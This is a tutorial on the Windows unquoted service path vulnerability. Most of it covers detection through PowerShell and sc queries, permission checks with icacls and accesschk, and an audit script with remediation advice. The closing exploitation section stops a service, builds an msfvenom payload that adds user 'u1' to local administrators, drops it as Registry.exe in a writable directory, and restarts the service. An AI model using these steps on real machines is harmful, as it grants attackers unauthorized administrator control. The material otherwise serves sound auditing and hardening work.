Unquoted Service Path Vulnerability

Overview

This is a common privilege-escalation vulnerability in Windows services, caused by improper handling of executable paths that contain spaces. When the path to a service executable is not wrapped in quotation marks, Windows may misinterpret where the executable name ends and attempt to run a different file higher up in the directory hierarchy, with the privileges of the service account.

Scenario

If the path to a service binary is:

C:\Program Files\My App\bin\service.exe

and it is not enclosed in quotes, Windows will try to execute the following, in order:

  1. C:\Program.exe

  2. C:\Program Files\My.exe

  3. C:\Program Files\My App\bin\service.exe

If an attacker has write access to any of these higher-precedence locations and can drop a malicious binary there, that binary may be executed instead of the intended service binary.


Detection

To find all services with potentially vulnerable paths, use the following commands.

List all services with path, name and start mode

Get-WmiObject Win32_Service | Select-Object Name, DisplayName, PathName, StartMode

Filter for auto-start services

Get-WmiObject Win32_Service | Where-Object {$_.StartMode -eq "Auto"} | Select-Object Name, DisplayName, PathName

Filter out services in the Windows directory

Get-WmiObject Win32_Service | Where-Object {
    $_.StartMode -eq "Auto" -and
    $_.PathName -notmatch "C:\\Windows"
} | Select-Object Name, DisplayName, PathName

Refine: exclude quoted paths and the Windows directory

Get-WmiObject Win32_Service | Where-Object {
    $_.StartMode -eq "Auto" -and
    $_.PathName -notmatch "C:\\Windows" -and   # skip built-in services under C:\Windows
    $_.PathName -notmatch '^"'                 # keep only paths that do not start with a quote
} | Select-Object Name, DisplayName, PathName

Detection (CMD Alternative)

List all services with binary paths using sc

for /f "tokens=2 delims=:" %s in ('sc query state^= all ^| findstr /i "SERVICE_NAME"') do @sc qc %s | findstr /i "SERVICE_NAME BINARY_PATH_NAME"

Same listing, excluding services whose paths are under C:\Windows (verbose)

for /f "tokens=2 delims=:" %s in ('sc query state^= all ^| findstr /i "SERVICE_NAME"') do @sc qc %s | findstr /i "SERVICE_NAME BINARY_PATH_NAME" | findstr /v /i "C:\Windows"

Check one specific service (example)

sc qc "AbyssWebServer"

Permissions

Using icacls to check the permissions

icacls "C:\Program Files\NETGATE\Registry Cleaner\RegistryCleanerSrv.exe"
icacls "C:\Program Files\NETGATE"

Using Sysinternals accesschk64 to check write, vulnerable and user access

accesschk64.exe -wvu "C:\Program Files\NETGATE"
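
Putting the Scenario, Detection and Permissions sections together in one script, as an added example that is not part of the original page: it enumerates auto-start services the same way the Get-WmiObject pipeline above does (using Get-CimInstance, its current replacement), computes the higher-precedence files Windows would try for each unquoted path, and checks the DACL of the directory where each such file would have to be created for write access by principals every standard user belongs to. The function names, the well-known SID list and the handling of arguments after the executable are this example's own assumptions; it assumes Windows PowerShell 5.1 or PowerShell 7 on Windows.

```powershell
# Added example (not from the original page). Function names and the candidate/ACL
# logic are this example's own; assumes Windows PowerShell 5.1 or PowerShell 7 on Windows.

function Get-UnquotedPathCandidates {
    # Returns the executables Windows would try BEFORE the intended one, in order,
    # for an unquoted service path that contains spaces. Quoted or space-free paths
    # yield nothing.
    param([Parameter(Mandatory)][string]$PathName)

    if ($PathName.TrimStart().StartsWith('"')) { return @() }

    # Service paths may carry arguments ("svc.exe -k netsvcs"), so cut at the first
    # ".exe" token instead of at the last space (assumption: the binary ends in .exe).
    $exePath = if ($PathName -match '^(.*?\.exe)(\s|$)') { $Matches[1] } else { $PathName }
    if ($exePath -notmatch ' ') { return @() }

    $parts = $exePath -split ' '
    $candidates = @()
    for ($i = 1; $i -lt $parts.Length; $i++) {
        # "C:\Program" -> "C:\Program.exe", "C:\Program Files\My" -> "C:\Program Files\My.exe"
        $candidates += (($parts[0..($i - 1)] -join ' ') + '.exe')
    }
    return $candidates
}

function Test-DirectoryWritableByStandardUsers {
    # True when a principal that every standard user belongs to can create files in $Directory.
    param([Parameter(Mandatory)][string]$Directory)

    if (-not (Test-Path -LiteralPath $Directory -PathType Container)) { return $false }

    # Well-known SIDs: Everyone, BUILTIN\Users, Authenticated Users, INTERACTIVE.
    $broadSids    = @('S-1-1-0', 'S-1-5-32-545', 'S-1-5-11', 'S-1-5-4')
    $createFiles  = [int][System.Security.AccessControl.FileSystemRights]::CreateFiles  # bit 0x2
    $genericWrite = 0x40000000   # GENERIC_WRITE, seen on some inherited ACEs
    $genericAll   = 0x10000000   # GENERIC_ALL

    foreach ($ace in (Get-Acl -LiteralPath $Directory).Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        # Inherit-only ACEs do not apply to this directory itself.
        if (($ace.PropagationFlags -band [System.Security.AccessControl.PropagationFlags]::InheritOnly) -ne 0) { continue }
        try {
            $sid = $ace.IdentityReference.Translate([System.Security.Principal.SecurityIdentifier]).Value
        } catch { continue }
        if ($broadSids -notcontains $sid) { continue }
        $rights = [int]$ace.FileSystemRights
        if ((($rights -band $createFiles) -ne 0) -or
            (($rights -band $genericWrite) -ne 0) -or
            (($rights -band $genericAll) -ne 0)) {
            return $true
        }
    }
    return $false
}

function Find-UnquotedServicePaths {
    # Same filter as the Detection section (auto-start, unquoted, outside C:\Windows),
    # expanded into one row per higher-precedence candidate file.
    Get-CimInstance -ClassName Win32_Service |
        Where-Object {
            $_.StartMode -eq 'Auto' -and
            $_.PathName -and
            $_.PathName -notmatch '^"' -and
            $_.PathName -notmatch '^C:\\Windows'
        } |
        ForEach-Object {
            $svc = $_
            foreach ($candidate in (Get-UnquotedPathCandidates -PathName $svc.PathName)) {
                $dropDir = Split-Path -Path $candidate -Parent
                [pscustomobject]@{
                    Service       = $svc.Name
                    RunsAs        = $svc.StartName      # account whose privileges are at stake
                    PathName      = $svc.PathName
                    Candidate     = $candidate
                    DropDirectory = $dropDir
                    UsersCanWrite = Test-DirectoryWritableByStandardUsers -Directory $dropDir
                }
            }
        }
}

# Example run: list every exposed candidate, writable directories first.
Find-UnquotedServicePaths | Sort-Object UsersCanWrite -Descending | Format-Table -AutoSize
```

Rows with UsersCanWrite set to True are the ones to remediate: quote the executable in the service's ImagePath (for example with sc.exe config and binPath=), then re-run the script and sc qc to confirm. The icacls and accesschk64 commands above remain the authoritative permission check, since this script ignores Deny ACEs and only looks at the four broad principals rather than evaluating group nesting.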

Exploitation Steps

1. Query the service

sc query <service_name>

2. Stop the service

sc stop <service_name>

3. Confirm it's stopped

sc query <service_name>

4. Create a malicious payload using msfvenom

msfvenom -p windows/exec CMD="net localgroup administrators u1 /add" -f exe > Registry.exe

5. Drop the malicious .exe in the writable path

C:\Program Files\NETGATE\Registry.exe

6. Restart the service

sc start <service_name>
